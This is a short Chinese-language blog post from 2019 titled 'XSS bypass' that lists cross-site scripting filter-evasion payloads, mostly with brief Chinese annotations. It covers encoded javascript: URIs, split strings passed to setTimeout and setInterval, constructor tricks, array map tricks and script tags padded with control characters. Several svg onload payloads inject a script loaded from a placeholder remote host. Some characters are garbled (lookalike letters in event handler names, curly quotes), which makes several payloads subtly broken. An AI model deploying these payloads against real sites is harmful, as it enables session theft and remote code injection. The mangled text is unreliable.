L1e’s blog
首页
关于
归档
搜索
xss绕过
发表于 2019-10-12
https://www.anquanke.com/post/id/176185
https://www.anquanke.com/post/id/176300
https://www.anquanke.com/post/id/176482
在html,标签内属性的值会html解码 值以外的其他不会解码
解码
<a text=“scr” “ipt”> 不会解码
payload:
常用payload:
xss
alt+shift+x触发XSS得payload
使用注释
<svg/onauxClick%3D"alertHackerOne
">
<img/src=“1”/οnerrοr=alert(1)>
<img src=1 οnerrοr=location=‘javascript:%61%6C%65%72%74%28%31%29’>
<img src=1 οnerrοr=location=‘javascript:\x61\x6C\x65\x72\x74\x28\x31\x29’>
<img src=1 οnerrοr=location=“javascr”+“ipt:”+“%61%6C%65%72%74%28%31%29”>
直接οnlοad=[‘java’,‘script:’,‘alert(1)’].join(‘’)是不行的,会变成"[‘java’,‘script:’,‘alert(1)’].join(‘’)"
setTimeout(“location=[‘javascript:al’,‘ert()’].join(‘’)”)
setTimeout,setInterval(要执行的函数)
<svg/οnlοad=setInterval(‘al’%2b’ert(1)‘)>
setTimeout("location=[‘javascript:al’,‘ert()’].join(’')")
<svg/οnlοad=setTimeoutalert(1)
>
<svg/οnlοad=setTimeoutalert\u00281\u0029
>编码
拆分与编码
<svg/οnlοad=u0073etInterval(appendChild(createElement(‘script’)).src=‘http://xx.xx/eeW’)>
<svg/οnlοad=u0073etInterval(appendChild(createElement(‘sc162ipt’)).src=‘http://xx.xx/eeW’)>
<svg/οnlοad=u0073etInterval(appendChild(createElement(‘scr’%2b’ipt’)).src=‘http://xx.xx/eeW’)>
<svg/οnlοad=u0073etInterval(u0061ppendChild(u0063reateElement(‘scr’%2b’ipt’)).src=‘http://xx.xx/eeW’)>
结合函数:
<svg/οnlοad=Set.constructor(‘\u0061\u006C’%2b’\u0065\u0072\u0074\u0028\u0031\u0029’)()>
<svg/οnlοad=Set.constructoral\x65rt\x28/xss/\x29```> <svg/onload=Map.constructor
al\x65rt\x28/xss/\x29> <svg/onload=clear.constructor`al\x65rt\x28/xss/\x29
>
<svg/οnlοad=Array.constructoral\x65rt\x28/xss/\x29```> <svg/onload=WeakSet.constructor
al\x65rt\x28/xss/\x29```>
利用数组
map函数
[1].map(alert) [1]为要传的参数 (alert)执行的函数
find,every,filter,forEach,findIndex和map函数同样效果
<img src=x οnerrοr=location=[‘javascript:[1]’,‘.map’,‘(al’,‘ert)’].join(‘’)>
payload
<script\x20type=“text/javascript”>javascript:alert(1);
<script\x3Etype=“text/javascript”>javascript:alert(1);
<script\x0Dtype=“text/javascript”>javascript:alert(1);
<script\x09type=“text/javascript”>javascript:alert(1);
<script\x0Ctype=“text/javascript”>javascript:alert(1);
<script\x2Ftype=“text/javascript”>javascript:alert(1);
<script\x0Atype=“text/javascript”>javascript:alert(1);
'"><\x3Cscript>javascript:alert(1)</script> '
"><\x00script>javascript:alert(1)